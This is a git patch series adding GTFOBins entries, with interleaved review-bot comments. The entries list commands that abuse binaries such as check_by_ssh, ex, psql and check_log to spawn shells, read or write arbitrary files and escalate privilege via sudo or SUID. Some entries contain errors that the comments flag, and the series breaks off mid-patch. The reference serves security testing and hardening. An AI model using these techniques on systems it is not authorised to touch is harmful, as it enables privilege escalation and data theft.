From 127738e9276a8a434bd46a8bde67b01e0fa27d62 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 01/43] New command: check_by_ssh
--- _gtfobins/check_by_ssh.md | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 _gtfobins/check_by_ssh.md
diff --git a/_gtfobins/check_by_ssh.md b/_gtfobins/check_by_ssh.md new file mode 100644
index 0000000..dedf47b
--- /dev/null
+++ b/_gtfobins/check_by_ssh.md
@@ -0,0 +1,29 @@
+---
+description: |
+ This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
+functions:
+ command:
+ - code: |
+ COMMAND='/usr/bin/id'
+ OUTPUT="output_file"
+ TF=$(mktemp)
+ echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF
+ check_by_ssh -F "$TF" -H localhost -C something
+ cat $OUTPUT
+ suid:
+ - code: |
+ COMMAND='/usr/bin/id'
+ OUTPUT="output_file"
+ TF=$(mktemp)
+ echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF
+ check_by_ssh -F "$TF" -H localhost -C something
+ cat $OUTPUT
+ sudo:
+ - code: |
+ COMMAND='/usr/bin/id'
+ OUTPUT="output_file"
+ TF=$(mktemp)
+ echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF
+ check_by_ssh -F "$TF" -H localhost -C something
+ cat $OUTPUT
+---
From 722f9bc605bf17a32dd92ff5733cb8630f56c01b Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 02/43] New command: check_cups
--- _gtfobins/check_cups.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/check_cups.md
diff --git a/_gtfobins/check_cups.md b/_gtfobins/check_cups.md new file mode 100644
index 0000000..841ec51
--- /dev/null
+++ b/_gtfobins/check_cups.md
@@ -0,0 +1,17 @@
+---
+description: |
+ This is the `check_cups` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ check_cups --extra-opts=@"$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./check_cups --extra-opts=@"$LFILE"
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo check_cups --extra-opts=@"$LFILE"
+---
From ea9dd24d595eb543c74fb02d7c4d0a66ea736dfe Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 03/43] New command: check_log
--- _gtfobins/check_log.md | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 _gtfobins/check_log.md
diff --git a/_gtfobins/check_log.md b/_gtfobins/check_log.md new file mode 100644
index 0000000..f869ad4
--- /dev/null
+++ b/_gtfobins/check_log.md
@@ -0,0 +1,30 @@
+---
+description: |
+ This is the `check_log` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ OUTPUT=output_file
+ umask 022
+ check_log -F "$LFILE" -O "$OUTPUT"
+ cat "$OUTPUT"
+ file-write:
+ - code: |
+ LFILE=file_to_write
+ INPUT=output_file
+ umask 022
+ check_log -F "$INPUT" -O "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_write
+ INPUT=output_file
+ umask 022
+ ./check_log -F "$INPUT" -O "$LFILE"
+ sudo:
+ - code: |
+ LFILE=file_to_write
+ INPUT=output_file
+ umask 022
+ sudo check_log -F "$INPUT" -O "$LFILE"
+---
From d0bbdb69cf198ade10fb95d7790aa10815348bce Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 04/43] New command: check_memory
--- _gtfobins/check_memory.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/check_memory.md
diff --git a/_gtfobins/check_memory.md b/_gtfobins/check_memory.md new file mode 100644
index 0000000..d04333a
--- /dev/null
+++ b/_gtfobins/check_memory.md
@@ -0,0 +1,17 @@
+---
+description: |
+ This is the `check_memory` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ check_memory --extra-opts=@"$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./check_memory --extra-opts=@"$LFILE"
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo check_memory --extra-opts=@"$LFILE"
+---
From 846a6131213f28122558210e33b98b998dc069ff Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 05/43] New command: check_raid
--- _gtfobins/check_raid.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/check_raid.md
diff --git a/_gtfobins/check_raid.md b/_gtfobins/check_raid.md new file mode 100644
index 0000000..2c7c775
--- /dev/null
+++ b/_gtfobins/check_raid.md
@@ -0,0 +1,17 @@
+---
+description: |
+ This is the `check_raid` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ check_raid --extra-opts=@"$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./check_raid --extra-opts=@"$LFILE"
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo check_raid --extra-opts=@"$LFILE"
+---
From e7c1b630ad39a9951b11f3471bf1b152bc236e38 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 06/43] New command: check_ssl_cert
--- _gtfobins/check_ssl_cert.md | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 _gtfobins/check_ssl_cert.md
diff --git a/_gtfobins/check_ssl_cert.md b/_gtfobins/check_ssl_cert.md new file mode 100644
index 0000000..6a2b4a3
--- /dev/null
+++ b/_gtfobins/check_ssl_cert.md
@@ -0,0 +1,34 @@
+---
+description: |
+ This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
+functions:
+ command:
+ - code: |
+ COMMAND='/usr/bin/id'
+ OUTPUT="output_file"
+ TF=$(mktemp)
+ echo "$COMMAND | tee \"$OUTPUT\"" > $TF
+ chmod +x $TF
+ check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS
+ cat $OUTPUT
+ suid:
+ - code: |
+ COMMAND='/usr/bin/id'
+ OUTPUT="output_file"
+ umask 022
+ TF=$(mktemp)
+ echo "$COMMAND | tee \"$OUTPUT\"" > $TF
+ chmod +x $TF
+ ./check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS
+ cat $OUTPUT
+ sudo:
+ - code: |
+ COMMAND='/usr/bin/id'
+ OUTPUT="output_file"
+ umask 022
+ TF=$(mktemp)
+ echo "$COMMAND | tee \"$OUTPUT\"" > $TF
+ chmod +x $TF
+ sudo check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS
+ cat $OUTPUT
+---
From 00902fc03515b1f4cff2351d71e4d865da008e56 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 07/43] New command: check_statusfile
--- _gtfobins/check_statusfile.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/check_statusfile.md
diff --git a/_gtfobins/check_statusfile.md b/_gtfobins/check_statusfile.md new file mode 100644
index 0000000..1812112
--- /dev/null
+++ b/_gtfobins/check_statusfile.md
@@ -0,0 +1,17 @@
+---
+description: |
+ This is the `check_statusfile` Nagios plugi plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ check_statusfile "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./check_statusfile "$LFILE"
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo check_statusfile "$LFILE"
+---
From ff997ac1046cfc6af5056beb4e81489cb9293e39 Mon Sep 17 00:00:00 2001
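Review bot: The description of the new _gtfobins/check_ssl_cert.md names the wrong binary: it says `This is the \`check_by_ssh\` Nagios plugin`, although the file documents check_ssl_cert, so the rendered page would mislabel the entry. Replace `check_by_ssh` with `check_ssl_cert` in that description line. The same sentence is carried forward unchanged as context in the check_ssl_cert.md hunks of PATCH 18 and PATCH 19, so it is still wrong at the end of this series.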
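Review bot: The description line of the new _gtfobins/check_statusfile.md contains a truncated duplicate word, `Nagios plugi plugin`; it should read `Nagios plugin` like the other plugin entries in this series. The later check_statusfile.md hunk in PATCH 19 starts below the description, so the typo is not corrected anywhere in this series.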
From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 08/43] New command: column
--- _gtfobins/column.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/column.md
diff --git a/_gtfobins/column.md b/_gtfobins/column.md new file mode 100644
index 0000000..078ec55
--- /dev/null
+++ b/_gtfobins/column.md
@@ -0,0 +1,15 @@
+---
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ column "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./column "$LFILE"
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo column "$LFILE"
+---
From 324e0e672aa35c37aa78767bc95200e3792a2145 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 09/43] New command: ex
--- _gtfobins/ex.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 _gtfobins/ex.md
diff --git a/_gtfobins/ex.md b/_gtfobins/ex.md new file mode 100644
index 0000000..8063c4e
--- /dev/null
+++ b/_gtfobins/ex.md
@@ -0,0 +1,28 @@
+---
+functions:
+ shell:
+ - code: |
+ ex
+ !/bin/sh
+ file-write:
+ - code: |
+ ex file_to_write
+ a
+ DATA
+ .
+ w
+ q
+ file-read:
+ - code: |
+ ex file_to_read
+ ,p
+ q
+ sudo:
+ - code: |
+ sudo ex
+ !/bin/sh
+ limited-suid:
+ - code: |
+ ./ex
+ !/bin/sh
+---
From 3d776d1ea85b40b51ce2df42103813d61c2f9211 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 10/43] New command: psql
--- _gtfobins/psql.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 _gtfobins/psql.md
diff --git a/_gtfobins/psql.md b/_gtfobins/psql.md new file mode 100644
index 0000000..f2a9b74
--- /dev/null
+++ b/_gtfobins/psql.md
@@ -0,0 +1,18 @@
+---
+functions:
+ shell:
+ - code: |
+ psql
+ \?
+ !/bin/sh
+ sudo:
+ - code: |
+ psql
+ \?
+ !/bin/sh
+ suid:
+ - code: |
+ psql
+ \?
+ !/bin/sh
+---
From a8458733eae094af74c23d93f4373ede9a36ea5e Mon Sep 17 00:00:00 2001
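Review bot: The `sudo:` entry of the new _gtfobins/psql.md runs plain `psql`, so it is byte-identical to the `shell:` entry and does not describe the sudo case; the `sudo:` entries of column.md and ex.md in this same series prefix the command with `sudo`, so this one should read `sudo psql`. Likewise its `suid:` entry invokes `psql` where the column.md and ex.md entries use the `./` form to denote the SUID copy. Both omissions recur on the new side of later hunks: the rewritten psql.md and the `sudo:` entry of check_ssl_cert.md in PATCH 19 (`check_ssl_cert --curl-bin $TF -H example.net` with no `sudo`), the `sudo:` entries of csplit.md, pr.md and split.md, and the `suid:` entries of basenc.md, comm.md, csplit.md, join.md, paste.md and pr.md (PATCHes 21–28).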
From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 11/43] New command: rev
--- _gtfobins/rev.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/rev.md
diff --git a/_gtfobins/rev.md b/_gtfobins/rev.md new file mode 100644
index 0000000..7fe91c3
--- /dev/null
+++ b/_gtfobins/rev.md
@@ -0,0 +1,15 @@
+---
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ rev "$LFILE" | rev
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./rev "$LFILE" | rev
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo rev "$LFILE" | rev
+---
From bde35dc4c7ef86bd09fd3564ebe526b65d65dec8 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 12/43] New command: ss
--- _gtfobins/ss.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/ss.md
diff --git a/_gtfobins/ss.md b/_gtfobins/ss.md new file mode 100644
index 0000000..082acd4
--- /dev/null
+++ b/_gtfobins/ss.md
@@ -0,0 +1,17 @@
+---
+description: |
+ The read file content is limited to the first line and corrupted by an error message.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ ss -a -F "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./ss -a -F "$LFILE"
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo ss -a -F "$LFILE"
+---
From 0a110bb0448600badf97d59bb1517b01a6db2665 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 13/43] New command: ssh-keygen
--- _gtfobins/ssh-keygen.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/ssh-keygen.md
diff --git a/_gtfobins/ssh-keygen.md b/_gtfobins/ssh-keygen.md new file mode 100644
index 0000000..3f7f1d7
--- /dev/null
+++ b/_gtfobins/ssh-keygen.md
@@ -0,0 +1,17 @@
+---
+description: |
+ The read file content is corrupted by error prints.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ ssh-keyscan -f "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./ssh-keyscan -f "$LFILE"
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo ssh-keyscan -f "$LFILE"
+---
From 5a58f6a3c3557ee0c70d11acde91704408c1abec Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 14/43] New command: tbl
--- _gtfobins/tbl.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/tbl.md
diff --git a/_gtfobins/tbl.md b/_gtfobins/tbl.md new file mode 100644
index 0000000..f78c5b8
--- /dev/null
+++ b/_gtfobins/tbl.md
@@ -0,0 +1,17 @@
+---
+description: |
+ The read file content is corrupted by additional text at the beginning.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ tbl "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./tbl "$LFILE"
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo tbl "$LFILE"
+---
From f9043b2f14f7e60dd24804e019e329757061c9cf Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 15/43] New command: troff
--- _gtfobins/troff.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/troff.md
diff --git a/_gtfobins/troff.md b/_gtfobins/troff.md new file mode 100644
index 0000000..82f59c3
--- /dev/null
+++ b/_gtfobins/troff.md
@@ -0,0 +1,17 @@
+---
+description: |
+ The read file content is corrupted by error prints.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ troff "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./troff "$LFILE"
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo troff "$LFILE"
+---
From 66cc5dd5123eb05621950670b5b7c7475342447e Mon Sep 17 00:00:00 2001
From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 16/43] New command: xmodmap
--- _gtfobins/xmodmap.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/xmodmap.md
diff --git a/_gtfobins/xmodmap.md b/_gtfobins/xmodmap.md new file mode 100644
index 0000000..8c32456
--- /dev/null
+++ b/_gtfobins/xmodmap.md
@@ -0,0 +1,17 @@
+---
+description: |
+ The read file content is corrupted by error prints.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ xmodmap -v "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./xmodmap -v "$LFILE"
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo xmodmap -v "$LFILE"
+---
From 64b4b9de1fbf749eceace8a95f3cfae215459f16 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:33:06 +0100 Subject: [PATCH 17/43] Fixed wrong filename
--- _gtfobins/{ssh-keygen.md => ssh-keyscan.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename _gtfobins/{ssh-keygen.md => ssh-keyscan.md} (100%)
diff --git a/_gtfobins/ssh-keygen.md b/_gtfobins/ssh-keyscan.md similarity index 100% rename from _gtfobins/ssh-keygen.md rename to _gtfobins/ssh-keyscan.md
From bd1e3ce65da0f8ef227ba6e053f9bb7a7c908803 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 21:36:18 +0100 Subject: [PATCH 18/43] Fixed indentation
--- _gtfobins/check_ssl_cert.md | 52 ++++++++++++++++++------------------- 1 file changed, 26 insertions(+), 26 deletions(-)
diff --git a/_gtfobins/check_ssl_cert.md b/_gtfobins/check_ssl_cert.md
index 6a2b4a3..2e5916d 100644
--- a/_gtfobins/check_ssl_cert.md
+++ b/_gtfobins/check_ssl_cert.md
@@ -3,32 +3,32 @@ description: | This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. functions: command: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF - chmod +x $TF - check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS - cat $OUTPUT + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + TF=$(mktemp) + echo "$COMMAND | tee \"$OUTPUT\"" > $TF + chmod +x $TF + check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + cat $OUTPUT suid: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - umask 022 - TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF - chmod +x $TF - ./check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS - cat $OUTPUT + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + umask 022 + TF=$(mktemp) + echo "$COMMAND | tee \"$OUTPUT\"" > $TF + chmod +x $TF + ./check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + cat $OUTPUT sudo: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - umask 022 - TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF - chmod +x $TF - sudo check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS - cat $OUTPUT + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + umask 022 + TF=$(mktemp) + echo "$COMMAND | tee \"$OUTPUT\"" > $TF + chmod +x $TF + sudo check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + cat $OUTPUT --- From 764b2685bc05cf350b4f2ece0e6439d7eda6158e Mon Sep 17 00:00:00 2001 
From: Emanuel Duss Date: Fri, 13 Nov 2020 11:56:48 +0100 Subject: [PATCH 19/43] Syntax cleanup, removed some non-working SUID entries --- _gtfobins/check_by_ssh.md | 24 ++++++++---------------- _gtfobins/check_cups.md | 8 ++------ _gtfobins/check_log.md | 16 ++++------------ _gtfobins/check_memory.md | 8 ++------ _gtfobins/check_raid.md | 8 ++------ _gtfobins/check_ssl_cert.md | 34 +++++++++++++--------------------- _gtfobins/check_statusfile.md | 8 ++------ _gtfobins/column.md | 6 +++--- _gtfobins/ex.md | 8 ++++---- _gtfobins/psql.md | 14 +++++++------- _gtfobins/rev.md | 6 +++--- _gtfobins/ss.md | 6 +++--- _gtfobins/ssh-keyscan.md | 6 +++--- _gtfobins/tbl.md | 6 +++--- _gtfobins/troff.md | 6 +++--- _gtfobins/xmodmap.md | 6 +++--- 16 files changed, 65 insertions(+), 105 deletions(-) diff --git a/_gtfobins/check_by_ssh.md b/_gtfobins/check_by_ssh.md index dedf47b..e00730e 100644 --- a/_gtfobins/check_by_ssh.md +++ b/_gtfobins/check_by_ssh.md @@ -4,26 +4,18 @@ description: | functions: command: - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF - check_by_ssh -F "$TF" -H localhost -C something - cat $OUTPUT - suid: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - TF=$(mktemp) - echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF - check_by_ssh -F "$TF" -H localhost -C something + echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF + check_by_ssh -F $TF -H localhost -C something cat $OUTPUT sudo: - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF - check_by_ssh -F "$TF" -H localhost -C something + echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF + sudo check_by_ssh -F $TF -H localhost -C something cat $OUTPUT --- diff --git a/_gtfobins/check_cups.md b/_gtfobins/check_cups.md index 841ec51..225e2ae 100644 --- a/_gtfobins/check_cups.md 
+++ b/_gtfobins/check_cups.md @@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_cups --extra-opts=@"$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_cups --extra-opts=@"$LFILE" + check_cups --extra-opts=@$LFILE sudo: - code: | LFILE=file_to_read - sudo check_cups --extra-opts=@"$LFILE" + sudo check_cups --extra-opts=@$LFILE --- diff --git a/_gtfobins/check_log.md b/_gtfobins/check_log.md index f869ad4..023cdbd 100644 --- a/_gtfobins/check_log.md +++ b/_gtfobins/check_log.md @@ -6,25 +6,17 @@ functions: - code: | LFILE=file_to_read OUTPUT=output_file - umask 022 - check_log -F "$LFILE" -O "$OUTPUT" - cat "$OUTPUT" + check_log -F $LFILE -O $OUTPUT + cat $OUTPUT file-write: - code: | LFILE=file_to_write INPUT=output_file - umask 022 - check_log -F "$INPUT" -O "$LFILE" - suid: - - code: | - LFILE=file_to_write - INPUT=output_file - umask 022 - ./check_log -F "$INPUT" -O "$LFILE" + check_log -F $INPUT -O $LFILE sudo: - code: | LFILE=file_to_write INPUT=output_file umask 022 - sudo check_log -F "$INPUT" -O "$LFILE" + sudo check_log -F $INPUT -O $LFILE --- diff --git a/_gtfobins/check_memory.md b/_gtfobins/check_memory.md index d04333a..8ca90eb 100644 --- a/_gtfobins/check_memory.md +++ b/_gtfobins/check_memory.md @@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_memory --extra-opts=@"$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_memory --extra-opts=@"$LFILE" + check_memory --extra-opts=@$LFILE sudo: - code: | LFILE=file_to_read - sudo check_memory --extra-opts=@"$LFILE" + sudo check_memory --extra-opts=@$LFILE --- diff --git a/_gtfobins/check_raid.md b/_gtfobins/check_raid.md index 2c7c775..ef1e823 100644 --- a/_gtfobins/check_raid.md +++ b/_gtfobins/check_raid.md 
@@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_raid --extra-opts=@"$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_raid --extra-opts=@"$LFILE" + check_raid --extra-opts=@$LFILE sudo: - code: | LFILE=file_to_read - sudo check_raid --extra-opts=@"$LFILE" + sudo check_raid --extra-opts=@$LFILE --- diff --git a/_gtfobins/check_ssl_cert.md b/_gtfobins/check_ssl_cert.md index 2e5916d..2401373 100644 --- a/_gtfobins/check_ssl_cert.md +++ b/_gtfobins/check_ssl_cert.md @@ -3,32 +3,24 @@ description: | This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. functions: command: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" + - description: The host example.net must return a certificate via TLS + code: | + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF + echo "$COMMAND | tee $OUTPUT" > $TF chmod +x $TF - check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS - cat $OUTPUT - suid: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - umask 022 - TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF - chmod +x $TF - ./check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + check_ssl_cert --curl-bin $TF -H example.net cat $OUTPUT sudo: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - umask 022 + - description: The host example.net must return a certificate via TLS + code: | + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF + echo "$COMMAND | tee $OUTPUT" > $TF chmod +x $TF - sudo check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + umask 022 + check_ssl_cert --curl-bin $TF -H example.net cat $OUTPUT --- diff --git a/_gtfobins/check_statusfile.md b/_gtfobins/check_statusfile.md index 1812112..dbb297b 100644 --- a/_gtfobins/check_statusfile.md +++ b/_gtfobins/check_statusfile.md 
@@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_statusfile "$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_statusfile "$LFILE" + check_statusfile $LFILE sudo: - code: | LFILE=file_to_read - sudo check_statusfile "$LFILE" + sudo check_statusfile $LFILE --- diff --git a/_gtfobins/column.md b/_gtfobins/column.md index 078ec55..af67980 100644 --- a/_gtfobins/column.md +++ b/_gtfobins/column.md @@ -3,13 +3,13 @@ functions: file-read: - code: | LFILE=file_to_read - column "$LFILE" + column $LFILE suid: - code: | LFILE=file_to_read - ./column "$LFILE" + ./column $LFILE sudo: - code: | LFILE=file_to_read - sudo column "$LFILE" + sudo column $LFILE --- diff --git a/_gtfobins/ex.md b/_gtfobins/ex.md index 8063c4e..1029504 100644 --- a/_gtfobins/ex.md +++ b/_gtfobins/ex.md @@ -3,7 +3,7 @@ functions: shell: - code: | ex - !/bin/sh + !sh file-write: - code: | ex file_to_write @@ -20,9 +20,9 @@ functions: sudo: - code: | sudo ex - !/bin/sh - limited-suid: + !sh + suid: - code: | ./ex - !/bin/sh + !sh -p --- diff --git a/_gtfobins/psql.md b/_gtfobins/psql.md index f2a9b74..ae7b794 100644 --- a/_gtfobins/psql.md +++ b/_gtfobins/psql.md @@ -4,15 +4,15 @@ functions: - code: | psql \? - !/bin/sh - sudo: - - code: | - psql - \? - !/bin/sh + !sh suid: - code: | psql \? - !/bin/sh + !sh -p + sudo: + - code: | + psql + \? + !sh --- diff --git a/_gtfobins/rev.md b/_gtfobins/rev.md index 7fe91c3..4e27759 100644 --- a/_gtfobins/rev.md +++ b/_gtfobins/rev.md @@ -3,13 +3,13 @@ functions: file-read: - code: | LFILE=file_to_read - rev "$LFILE" | rev + rev $LFILE | rev suid: - code: | LFILE=file_to_read - ./rev "$LFILE" | rev + ./rev $LFILE | rev sudo: - code: | LFILE=file_to_read - sudo rev "$LFILE" | rev + sudo rev $LFILE | rev --- diff --git a/_gtfobins/ss.md b/_gtfobins/ss.md index 082acd4..28d4bce 100644 --- a/_gtfobins/ss.md +++ b/_gtfobins/ss.md 
@@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - ss -a -F "$LFILE" + ss -a -F $LFILE suid: - code: | LFILE=file_to_read - ./ss -a -F "$LFILE" + ./ss -a -F $LFILE sudo: - code: | LFILE=file_to_read - sudo ss -a -F "$LFILE" + sudo ss -a -F $LFILE --- diff --git a/_gtfobins/ssh-keyscan.md b/_gtfobins/ssh-keyscan.md index 3f7f1d7..e5bb84c 100644 --- a/_gtfobins/ssh-keyscan.md +++ b/_gtfobins/ssh-keyscan.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - ssh-keyscan -f "$LFILE" + ssh-keyscan -f $LFILE suid: - code: | LFILE=file_to_read - ./ssh-keyscan -f "$LFILE" + ./ssh-keyscan -f $LFILE sudo: - code: | LFILE=file_to_read - sudo ssh-keyscan -f "$LFILE" + sudo ssh-keyscan -f $LFILE --- diff --git a/_gtfobins/tbl.md b/_gtfobins/tbl.md index f78c5b8..93ec6fa 100644 --- a/_gtfobins/tbl.md +++ b/_gtfobins/tbl.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - tbl "$LFILE" + tbl $LFILE suid: - code: | LFILE=file_to_read - ./tbl "$LFILE" + ./tbl $LFILE sudo: - code: | LFILE=file_to_read - sudo tbl "$LFILE" + sudo tbl $LFILE --- diff --git a/_gtfobins/troff.md b/_gtfobins/troff.md index 82f59c3..52a2bdc 100644 --- a/_gtfobins/troff.md +++ 